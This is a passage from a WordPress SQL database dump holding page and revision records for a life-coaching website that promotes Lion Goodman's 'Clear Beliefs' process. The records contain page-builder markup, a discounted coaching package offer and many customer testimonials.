lose, it appears. Get on with it, do it now!</em> ~ D.F., Portland, Oregon[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336800668{margin-top: 30px !important;}"]<em>The Clear Beliefs training with Lion is the single best investment I’ve made in my well-being for a very long time. I experienced deep core insights right from the beginning, and in each and every session. As I released old, limiting conditioning and confirmed new, revitalizing beliefs, my optimism, clarity, productivity and finances increased too! If you are ready to address the challenges you are facing and take a stand for having what you want, I cannot recommend his programs more highly.</em>\r\n\r\n~ Sandy Kuehl, Des Moines, Iowa[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336812291{margin-top: 30px !important;}"]<em>I use the Clear Beliefs process for myself every week, and I use it with my clients regularly. My whole life is shifting. I used to be miserable because of my inner critic. I am much more generous and forgiving of myself. I now live without the constant judgment and feeling bad about everything. I am cheerful more often, including at home.  I am taking steps that I just couldn’t before and now it seems natural. My heart swells instead of hides and shrivels. That is the best outcome for me because it allows me to move forward. This work is real. It creates positive change. It’s beautiful.</em>  ~ R.T., Denver, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336821891{margin-top: 30px !important;}"]<em>There’s something about this process that has made it much easier to let underlying beliefs float to the surface where I can see them for what they are. They seem like separate entities that I can address respectfully, rather than shameful things to avoid.</em>\r\n\r\n~ B.L., Paducah, Kentucky[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336832515{margin-top: 30px !important;}"]<em>This belief course was exactly what I had been searching for but couldn’t find. It’s been liberating and enlightening to be able to finally uncover and discover the blocks and beliefs that have been problematic, worrisome, stressful and hindering in many aspects and areas of my life. I appreciate that this is something I can continue to practice on my own, and get excellent results! Thank you!</em>\r\n\r\n~ Janna Ekstrom, Bend, Oregon[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336848334{margin-top: 30px !important;}"]<em>In the course we got to witness many people releasing negative beliefs about themselves. You could actually hear their voice change – they sounded lighter, often laughing and giggling like kids! It’s been amazing and inspirational to watch Lion work. In one session he helped the person create a new belief: “I am joyful and my inner child is safe.” It is miraculous to watch the changes from so simple an act.\r\n</em>~ Thea Deley, Paonia, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336857556{margin-top: 30px !important;}"]<em>You have really given me confidence that troublesome beliefs can, in fact, be changed.</em>\r\n~ Julian Graham, London, England[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336869972{margin-top: 30px !important;}"]<em>As a Stress Therapist, I can recommend the Clear Beliefs Process as a first place winner to relieve stress and create a balanced life! I’ve studied cognitive work and believe that this work is much more value for the money – it actually transforms your subconscious mind – which is a rare thing!\r\n</em>~ Marina Malmberg, Stress Therapist, Sweden[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336878620{margin-top: 30px !important;}"]<em>The Clear Beliefs process is amazing in terms of the results produced in just a few weeks. My core beliefs, which had been troublesome for decades, simply lost their emotional charge — and were replaced by new beliefs that support and thrill me!</em>\r\n~ Jim Bird, Downingtown, PA[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336886556{margin-top: 30px !important;}"]<em>Lion’s voice and manner are reassuring and unflappable.  I was amazed by his ability to support and encourage every client. If one approach did not reach the problem, he shifted to yet another way to look at things. You could hear the change in the participant’s voice when the core belief was reached. Amazing!</em>\r\n~ M.P., Auckland, New Zealand[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336894292{margin-top: 30px !important;}"]<em>The techniques are both fun and powerful. This work will continue to influence how I think and perceive what’s going on in my head – and in my life!</em>\r\n~ L.Z., Paris, France[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336902995{margin-top: 30px !important;}"]<em>My experience has been deep, bittersweet, and liberating. After dis-creating many core beliefs from my early childhood, those belief clusters were gone. Others surfaced, which Lion said was normal, and a part of the process. I will use the Clear Beliefs Process to deal with them, one by one, and I’m confident that I have the tools in hand.\r\n</em>~ P.P., Boca Raton, Florida[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336911587{margin-top: 30px !important;}"]<em>In terms of change in and for myself, and in terms of time spent, this was about the best investment I’ve ever made in a course (and I have taken many).</em>\r\n~ D.K., Bozeman, Montana[/vc_column_text][/vc_column][vc_column width="1/6"][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2510" img_size="full" alignment="center" onclick="custom_link" link="https://beliefcloset.infusionsoft.com/app/orderForms/1e28f740-4a29-4ad7-bbe9-cf45a781a354"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row]', 'test', '', 'publish', 'closed', 'closed', '', 'test-2', '', '', '2017-04-04 15:27:30', '2017-04-04 20:27:30', '', 0, 'http://clearyourbeliefs.com/?page_id=2506', 0, 'page', '', 0),
(2488, 2, '2017-04-01 09:35:51', '2017-04-01 14:35:51', '', 'Register-here-button-red-AdobeStock_142550519', '', 'inherit', 'open', 'open', '', 'register-here-button-red-adobestock_142550519', '', '', '2017-04-01 09:35:51', '2017-04-01 14:35:51', '', 2486, 'http://clearyourbeliefs.com/wp-content/uploads/2017/03/Register-here-button-red-AdobeStock_142550519.png', 0, 'attachment', 'image/png', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2492, 135, '2017-04-04 15:31:05', '2017-04-04 20:31:05', '[vc_row css=".vc_custom_1491335160850{margin-bottom: 0px !important;}"][vc_column][vc_column_text el_class="site-title-one"]<strong>Get Real Relief from Life’s Problems </strong>with Coaching by Lion[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="desc-one"]<strong><img class="alignleft wp-image-1433 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />Lion’s expertise is finding (and deleting) core beliefs deep in your subconscious mind – </strong>beliefs that cause serious trouble in your life. He gently guides you through the process of clearing them, once and for all, so they never interfere with your life again.\n\n<strong>Many of us suffer from <em>Developmental Trauma</em></strong> – the bad programming we got when we were children.  Your parents, teachers, and caregivers were likely not models of unconditional love! So you took on beliefs, and conclusions, about yourself and the world. Negative and limiting beliefs at the core of your psyche can result in many different symptoms and conditions:[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491335119652{padding-right: 100px !important;padding-left: 100px !important;}"][vc_column width="1/2"][vc_column_text el_class="desc-one"]\n<ul>\n	<li>Low-self-esteem and negative self-talk</li>\n	<li>Comparing and judgment of self and others</li>\n	<li>Critical or mean inner voices</li>\n	<li>Lack of motivation</li>\n	<li>Inability to bounce back from failure or challenge</li>\n</ul>\n[/vc_column_text][/vc_column][vc_column width="1/2"][vc_column_text el_class="desc-one"]\n<ul>\n	<li>Interference with success in business</li>\n	<li>Difficulty with personal and work relationships</li>\n	<li>Weight and health problems</li>\n	<li>… and other uncomfortable feelings, body sensations, habits, and behaviors.</li>\n</ul>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2513" img_size="full" alignment="center" onclick="custom_link" link="https://beliefcloset.infusionsoft.com/app/orderForms/1e28f740-4a29-4ad7-bbe9-cf45a781a354"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]THE PROCESS[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337395678{margin-top: 0px !important;}"][vc_column][vc_column_text el_class="desc-one"]In each session, Lion will ask you to name the problem or condition that has been bugging you or holding you back. With careful questioning, you will discover the source of the pattern – beliefs from your childhood that are still operating in your subconscious mind.\n\nLion then guides you through the <em><strong>Clear Your Beliefs Process</strong></em>, and shows you how to easily, efficiently, and permanently delete these source materials from your psyche.\n\n<strong>The next step is to choose what you would rather believe</strong> about yourself, the other person, or the circumstance that created the old belief.  This give you the opportunity to program your own mind with the best of your wisdom and virtues, based on your own free will choice.  <strong>You decide what you want to believe, in every case.  You become the creator of your own life.</strong>[/vc_column_text][/vc_column][/vc_row][vc_row parallax="content-moving" parallax_image="2512" css=".vc_custom_1491337388303{margin-top: 20px !important;}"][vc_column][vc_empty_space height="300px"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]SPECIAL LIMITED TIME OFFER[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337395678{margin-top: 0px !important;}"][vc_column][vc_column_text el_class="desc-one"]<strong>For a limited time, Lion is offering a package of 7 coaching hours at his lowest discounted rate of $175 per hour.</strong>  This is a 30% savings from his usual price of $250 per hour.  The package price is only $1,225. You save $525.\n\nYou may use these hours for seven one-hour sessions, or for longer sessions (after the first hour, time is billed in 15-minute increments, so your session can be 1.25, 1.5, 1.75, or 2 hours long).[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2513" img_size="full" alignment="center" onclick="custom_link" link="https://beliefcloset.infusionsoft.com/app/orderForms/1e28f740-4a29-4ad7-bbe9-cf45a781a354"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2513" img_size="full" alignment="center" onclick="custom_link" link="https://beliefcloset.infusionsoft.com/app/orderForms/1e28f740-4a29-4ad7-bbe9-cf45a781a354"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]WHAT PEOPLE ARE SAYING ABOUT LION GOODMAN, P.C.C.[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337580910{margin-top: 20px !important;}"][vc_column width="1/6"][/vc_column][vc_column width="2/3" el_class="blovk1"][vc_column_text el_class="testi-1"]<em>When I realized I needed support, you took my hand and guided me into the scariest, darkest, and hot-as-hell locations of my inner psyche. As the healing began, I released one obstacle at a time, and received the nourishment needed to heal. Thank you for opening my heart and soul.  </em>\n~ Nance B., Spokane, Washington[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336569871{margin-top: 30px !important;}"]<em>Lion taught me and encouraged me to embrace and understand pain and discomfort through mindfulness, meditation, and his Clear Beliefs process. That has allowed me to remove pills from my life</em>.\n\n~ P. Zeller, Denver, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336617630{margin-top: 30px !important;}"]<em>I continue to use the Clear Beliefs process on myself, and with my clients. It continues to grow organically (just as you predicted) from my clients’ individual needs.</em>\n\n~ Melinda Matzell, Therapeutic Yoga Instructor and Therapist[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336633092{margin-top: 30px !important;}"]<em>I’m very excited by how I’ve been using the Clear Beliefs Process. I love integrating your powerful tools in a larger context and flow of practices. I think it’s a huge part of the success my students are experiencing.</em>\n\n~ Tomar Levine, Soul Guidance for Business, New York[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336646140{margin-top: 30px !important;}"]<em>In our very powerful coaching session, I felt a shift both emotionally and physically. What had been stuck inside me my whole life finally came out. I’m still processing what happened, but for maybe the first time in my life, I feel shame-free. I no longer feel the need to justify myself for who I am.” </em>  ~ MRG, Pasadena, California[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336660589{margin-top: 30px !important;}"]<em>Thanks again for a powerful session. That night, my wife and I were planning a trip to Costa Rica. With a more grounded energy inside of me, I had new eyes, and new possibilities opened up. We magically found a way to reduce the cost of the trip by several thousand dollars! It felt like a direct result of the session, with practical intelligence starting to operate more fully inside of me. The session has already paid for itself many times!</em>\n\n~ David Nicol, Ph.D., Sebastopol, California[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336672294{margin-top: 30px !important;}"]<em>I have been living in a completely new space since our work together. The shame has virtually disappeared. I have a new life. I feel free. It’s like the contents in my psyche’s warehouse have been removed and I can now explore this openness. I can think more clearly. I am more alert, more energetic. I no longer feel like I’m dragging a burden around all the time. I am sooo much lighter. I am growing up! It’s rather miraculous. My children have noticed the changes and they are changing too. The tension has been radically reduced. It is a new beginning – a new life!</em>\n\n~ Sherri Pula, Ontario Canada[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336684398{margin-top: 30px !important;}"]<em>I used your technique for getting rid of underlying belief around money. I’m on commission and hadn’t had a sale in 3 months. 18 hours after clearing my beliefs, I got a call from a prospect I had given up on. He said he’s ready to buy!</em>\n\n~ Gene Tress, Ann Arbor, Michigan[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336696821{margin-top: 30px !important;}"]<em>The Clear Beliefs Process is simply the best way I’ve found to permanently remove old troublesome beliefs. The process works even on core beliefs, established in early childhood – the ones that have produced intense suffering for decades. Over the past four months I’ve witnessed amazing changes in myself, and in those I’m working with.</em>\n\n~ Jim Bird, Life Coach, Downingtown, Pennsylvania[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336709999{margin-top: 30px !important;}"]<em>The Clear Beliefs course has been a joy and privilege to attend. I’ve cleared what has kept me stuck from moving forward in my life. The tools have enabled me to take action and get me off my ass and create! It has been a joy and a blessing. As a Licensed Psychological Counselor in private practice, what I’ve learned has brought a new sense of joy and excitement into my work. My clients tell me they love the processes and are excited in the results they are getting – especially the children. I love seeing them reconnect to their joy, happiness and childlike wonder.</em>\n\n~ Deborah Chelette-Wilson, Winnsboro, Texas[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336721668{margin-top: 30px !important;}"]<em>I have used the Clear Beliefs process many times, and find it extremely useful.  It makes belief change much easier than with other processes I have used in the past. It is very powerful. I’ve had some amazing results with it. My old belief outfits are sometimes quite ghastly and unpleasant. My new beliefs feel wonderful, and they are beautiful, shiny, expansive and open.  Thank you very much for developing and sharing such a powerful process.</em>\n\n~ Jaki Kennedy, Kingston Upon Thames, England[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336733101{margin-top: 30px !important;}"]<em>You were the turning point for me. You helped me awaken, and you saw me and believed in me when I was showing up as a shy, confused and sad young woman. I honestly don’t know where I’d be without you. I so appreciate your love, knowledge and mentorship.</em>\n\n~ Sally Hope, Wildheart Revolution, Bozeman, Montana[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336746644{margin-top: 30px !important;}"]<em>The last 40 years of my life were tough – a lot of difficulties and very little joy. I came to the same painful places too often, which left me feeling immense grief, or uncomfortable numbness at best. During our work together, my zest for life began to come back. I am beginning to experience joy and excitement, and to create my life, rather than letting it pass me by. I look forward to the new bright day that is dawning. I am very grateful to you.</em>\n\n~ Monika Jacobson, Stuttgart, Germany[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336769741{margin-top: 30px !important;}"]<em>Lion is one of the most intelligent, caring, creative, and experienced mental health professionals I have ever met. My gratitude cannot be expressed with words.</em>\n\n~ Jeanette Spence, APRN, Columbia, South Carolina[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336780046{margin-top: 30px !important;}"]<em>The Clear Beliefs Process transformed several underlying beliefs which had previously limited me. I gained not only new, more powerful beliefs, but I also learned a process I can use in the future to fine-tune my beliefs anytime in the future.</em>\n\n~ Kathryn P., Summit County, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336790325{margin-top: 30px !important;}"]<em>The impact of our work together is still unfolding. My inner child was healed by your loving reflections and the message of protection you delivered. This opened me to move beyond the hurts and harm of the past, and brought new-found awareness.  I feel freed from dragging around garbage bags of weighty stuff, and the radiance of true Beingness that showed up at the end is still with me! I see and feel things coming to me that will propel my growth and movement as a change agent and Light Server. There is no time to lose, it appears. Get on with it, do it now!</em> ~ D.F., Portland, Oregon[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336800668{margin-top: 30px !important;}"]<em>The Clear Beliefs training with Lion is the single best investment I’ve made in my well-being for a very long time. I experienced deep core insights right from the beginning, and in each and every session. As I released old, limiting conditioning and confirmed new, revitalizing beliefs, my optimism, clarity, productivity and finances increased too! If you are ready to address the challenges you are facing and take a stand for having what you want, I cannot recommend his programs more highly.</em>\n\n~ Sandy Kuehl, Des Moines, Iowa[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336812291{margin-top: 30px !important;}"]<em>I use the Clear Beliefs process for myself every week, and I use it with my clients regularly. My whole life is shifting. I used to be miserable because of my inner critic. I am much more generous and forgiving of myself. I now live without the constant judgment and feeling bad about everything. I am cheerful more often, including at home.  I am taking steps that I just couldn’t before and now it seems natural. My heart swells instead of hides and shrivels. That is the best outcome for me because it allows me to move forward. This work is real. It creates positive change. It’s beautiful.</em>  ~ R.T., Denver, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336821891{margin-top: 30px !important;}"]<em>There’s something about this process that has made it much easier to let underlying beliefs float to the surface where I can see them for what they are. They seem like separate entities that I can address respectfully, rather than shameful things to avoid.</em>\n\n~ B.L., Paducah, Kentucky[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336832515{margin-top: 30px !important;}"]<em>This belief course was exactly what I had been searching for but couldn’t find. It’s been liberating and enlightening to be able to finally uncover and discover the blocks and beliefs that have been problematic, worrisome, stressful and hindering in many aspects and areas of my life. I appreciate that this is something I can continue to practice on my own, and get excellent results! Thank you!</em>\n\n~ Janna Ekstrom, Bend, Oregon[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336848334{margin-top: 30px !important;}"]<em>In the course we got to witness many people releasing negative beliefs about themselves. You could actually hear their voice change – they sounded lighter, often laughing and giggling like kids! It’s been amazing and inspirational to watch Lion work. In one session he helped the person create a new belief: “I am joyful and my inner child is safe.” It is miraculous to watch the changes from so simple an act.\n</em>~ Thea Deley, Paonia, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336857556{margin-top: 30px !important;}"]<em>You have really given me confidence that troublesome beliefs can, in fact, be changed.</em>\n~ Julian Graham, London, England[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336869972{margin-top: 30px !important;}"]<em>As a Stress Therapist, I can recommend the Clear Beliefs Process as a first place winner to relieve stress and create a balanced life! I’ve studied cognitive work and believe that this work is much more value for the money – it actually transforms your subconscious mind – which is a rare thing!\n</em>~ Marina Malmberg, Stress Therapist, Sweden[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336878620{margin-top: 30px !important;}"]<em>The Clear Beliefs process is amazing in terms of the results produced in just a few weeks. My core beliefs, which had been troublesome for decades, simply lost their emotional charge — and were replaced by new beliefs that support and thrill me!</em>\n~ Jim Bird, Downingtown, PA[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336886556{margin-top: 30px !important;}"]<em>Lion’s voice and manner are reassuring and unflappable.  I was amazed by his ability to support and encourage every client. If one approach did not reach the problem, he shifted to yet another way to look at things. You could hear the change in the participant’s voice when the core belief was reached. Amazing!</em>\n~ M.P., Auckland, New Zealand[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336894292{margin-top: 30px !important;}"]<em>The techniques are both fun and powerful. This work will continue to influence how I think and perceive what’s going on in my head – and in my life!</em>\n~ L.Z., Paris, France[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336902995{margin-top: 30px !important;}"]<em>My experience has been deep, bittersweet, and liberating. After dis-creating many core beliefs from my early childhood, those belief clusters were gone. Others surfaced, which Lion said was normal, and a part of the process. I will use the Clear Beliefs Process to deal with them, one by one, and I’m confident that I have the tools in hand.\n</em>~ P.P., Boca Raton, Florida[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336911587{margin-top: 30px !important;}"]<em>In terms of change in and for myself, and in terms of time spent, this was about the best investment I’ve ever made in a course (and I have taken many).</em>\n~ D.K., Bozeman, Montana[/vc_column_text][/vc_column][vc_column width="1/6"][/vc_column][/vc_row][vc_row css=".vc_custom_1491337706086{margin-top: 30px !important;}"][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2510" img_size="300x120" alignment="center" onclick="custom_link" link="https://beliefcloset.infusionsoft.com/app/orderForms/1e28f740-4a29-4ad7-bbe9-cf45a781a354"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row]', 'Coaching with Lion Goodman', '', 'inherit', 'open', 'open', '', '2486-autosave-v1', '', '', '2017-04-04 15:31:05', '2017-04-04 20:31:05', '', 2486, 'http://clearyourbeliefs.com/2486-autosave-v1/', 0, 'revision', '', 0),
(2493, 135, '2017-04-01 14:22:36', '2017-04-01 19:22:36', '[vc_row][vc_column][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column][/vc_row]', 'test', '', 'publish', 'closed', 'closed', '', 'test', '', '', '2017-04-01 14:22:36', '2017-04-01 19:22:36', '', 0, 'http://clearyourbeliefs.com/?page_id=2493', 0, 'page', '', 0),
(2508, 135, '2017-04-04 15:26:46', '2017-04-04 20:26:46', '[vc_row css=".vc_custom_1491335160850{margin-bottom: 0px !important;}"][vc_column][vc_column_text el_class="site-title-one"]<strong>Get Real Relief from Life’s Problems </strong>with Coaching by Lion[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="desc-one"]<strong><img class="alignleft wp-image-1433 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />Lion’s expertise is finding (and deleting) core beliefs deep in your subconscious mind – </strong>beliefs that cause serious trouble in your life. He gently guides you through the process of clearing them, once and for all, so they never interfere with your life again.\r\n\r\n<strong>Many of us suffer from <em>Developmental Trauma</em></strong> – the bad programming we got when we were children.  Your parents, teachers, and caregivers were likely not models of unconditional love! So you took on beliefs, and conclusions, about yourself and the world. Negative and limiting beliefs at the core of your psyche can result in many different symptoms and conditions:[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491335119652{padding-right: 100px !important;padding-left: 100px !important;}"][vc_column width="1/2"][vc_column_text el_class="desc-one"]\r\n<ul>\r\n	<li>Low-self-esteem and negative self-talk</li>\r\n	<li>Comparing and judgment of self and others</li>\r\n	<li>Critical or mean inner voices</li>\r\n	<li>Lack of motivation</li>\r\n	<li>Inability to bounce back from failure or challenge</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][vc_column width="1/2"][vc_column_text el_class="desc-one"]\r\n<ul>\r\n	<li>Interference with success in business</li>\r\n	<li>Difficulty with personal and work relationships</li>\r\n	<li>Weight and health problems</li>\r\n	<li>… and other uncomfortable feelings, body sensations, habits, and behaviors.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2510" img_size="full" alignment="center" onclick="custom_link" link="https://beliefcloset.infusionsoft.com/app/orderForms/1e28f740-4a29-4ad7-bbe9-cf45a781a354"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]THE PROCESS[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337395678{margin-top: 0px !important;}"][vc_column][vc_column_text el_class="desc-one"]In each session, Lion will ask you to name the problem or condition that has been bugging you or holding you back. With careful questioning, you will discover the source of the pattern – beliefs from your childhood that are still operating in your subconscious mind.\r\n\r\nLion then guides you through the <em><strong>Clear Your Beliefs Process</strong></em>, and shows you how to easily, efficiently, and permanently delete these source materials from your psyche.\r\n\r\n<strong>The next step is to choose what you would rather believe</strong> about yourself, the other person, or the circumstance that created the old belief.  This give you the opportunity to program your own mind with the best of your wisdom and virtues, based on your own free will choice.  <strong>You decide what you want to believe, in every case.  You become the creator of your own life.</strong>[/vc_column_text][/vc_column][/vc_row][vc_row parallax="content-moving" parallax_image="2512" css=".vc_custom_1491337388303{margin-top: 20px !important;}"][vc_column][vc_empty_space height="300px"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]SPECIAL LIMITED TIME OFFER[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337395678{margin-top: 0px !important;}"][vc_column][vc_column_text el_class="desc-one"]<strong>For a limited time, Lion is offering a package of 7 coaching hours at his lowest discounted rate of $175 per hour.</strong>  This is a 30% savings from his usual price of $250 per hour.  The package price is only $1,225. You save $525.\r\n\r\nYou may use these hours for seven one-hour sessions, or for longer sessions (after the first hour, time is billed in 15-minute increments, so your session can be 1.25, 1.5, 1.75, or 2 hours long).[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2510" img_size="full" alignment="center" onclick="custom_link" link="https://beliefcloset.infusionsoft.com/app/orderForms/1e28f740-4a29-4ad7-bbe9-cf45a781a354"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]WHAT PEOPLE ARE SAYING ABOUT LION GOODMAN, P.C.C.[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337580910{margin-top: 20px !important;}"][vc_column width="1/6"][/vc_column][vc_column width="2/3" el_class="blovk1"][vc_column_text el_class="testi-1"]<em>When I realized I needed support, you took my hand and guided me into the scariest, darkest, and hot-as-hell locations of my inner psyche. As the healing began, I released one obstacle at a time, and received the nourishment needed to heal. Thank you for opening my heart and soul.  </em>\r\n~ Nance B., Spokane, Washington[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336569871{margin-top: 30px !important;}"]<em>Lion taught me and encouraged me to embrace and understand pain and discomfort through mindfulness, meditation, and his Clear Beliefs process. That has allowed me to remove pills from my life</em>.\r\n\r\n~ P. Zeller, Denver, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336617630{margin-top: 30px !important;}"]<em>I continue to use the Clear Beliefs process on myself, and with my clients. It continues to grow organically (just as you predicted) from my clients’ individual needs.</em>\r\n\r\n~ Melinda Matzell, Therapeutic Yoga Instructor and Therapist[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336633092{margin-top: 30px !important;}"]<em>I’m very excited by how I’ve been using the Clear Beliefs Process. I love integrating your powerful tools in a larger context and flow of practices. I think it’s a huge part of the success my students are experiencing.</em>\r\n\r\n~ Tomar Levine, Soul Guidance for Business, New York[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336646140{margin-top: 30px !important;}"]<em>In our very powerful coaching session, I felt a shift both emotionally and physically. What had been stuck inside me my whole life finally came out. I’m still processing what happened, but for maybe the first time in my life, I feel shame-free. I no longer feel the need to justify myself for who I am.” </em>  ~ MRG, Pasadena, California[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336660589{margin-top: 30px !important;}"]<em>Thanks again for a powerful session. That night, my wife and I were planning a trip to Costa Rica. With a more grounded energy inside of me, I had new eyes, and new possibilities opened up. We magically found a way to reduce the cost of the trip by several thousand dollars! It felt like a direct result of the session, with practical intelligence starting to operate more fully inside of me. The session has already paid for itself many times!</em>\r\n\r\n~ David Nicol, Ph.D., Sebastopol, California[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336672294{margin-top: 30px !important;}"]<em>I have been living in a completely new space since our work together. The shame has virtually disappeared. I have a new life. I feel free. It’s like the contents in my psyche’s warehouse have been removed and I can now explore this openness. I can think more clearly. I am more alert, more energetic. I no longer feel like I’m dragging a burden around all the time. I am sooo much lighter. I am growing up! It’s rather miraculous. My children have noticed the changes and they are changing too. The tension has been radically reduced. It is a new beginning – a new life!</em>\r\n\r\n~ Sherri Pula, Ontario Canada[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336684398{margin-top: 30px !important;}"]<em>I used your technique for getting rid of underlying belief around money. I’m on commission and hadn’t had a sale in 3 months. 18 hours after clearing my beliefs, I got a call from a prospect I had given up on. He said he’s ready to buy!</em>\r\n\r\n~ Gene Tress, Ann Arbor, Michigan[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336696821{margin-top: 30px !important;}"]<em>The Clear Beliefs Process is simply the best way I’ve found to permanently remove old troublesome beliefs. The process works even on core beliefs, established in early childhood – the ones that have produced intense suffering for decades. Over the past four months I’ve witnessed amazing changes in myself, and in those I’m working with.</em>\r\n\r\n~ Jim Bird, Life Coach, Downingtown, Pennsylvania[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336709999{margin-top: 30px !important;}"]<em>The Clear Beliefs course has been a joy and privilege to attend. I’ve cleared what has kept me stuck from moving forward in my life. The tools have enabled me to take action and get me off my ass and create! It has been a joy and a blessing. As a Licensed Psychological Counselor in private practice, what I’ve learned has brought a new sense of joy and excitement into my work. My clients tell me they love the processes and are excited in the results they are getting – especially the children. I love seeing them reconnect to their joy, happiness and childlike wonder.</em>\r\n\r\n~ Deborah Chelette-Wilson, Winnsboro, Texas[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336721668{margin-top: 30px !important;}"]<em>I have used the Clear Beliefs process many times, and find it extremely useful.  It makes belief change much easier than with other processes I have used in the past. It is very powerful. I’ve had some amazing results with it. My old belief outfits are sometimes quite ghastly and unpleasant. My new beliefs feel wonderful, and they are beautiful, shiny, expansive and open.  Thank you very much for developing and sharing such a powerful process.</em>\r\n\r\n~ Jaki Kennedy, Kingston Upon Thames, England[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336733101{margin-top: 30px !important;}"]<em>You were the turning point for me. You helped me awaken, and 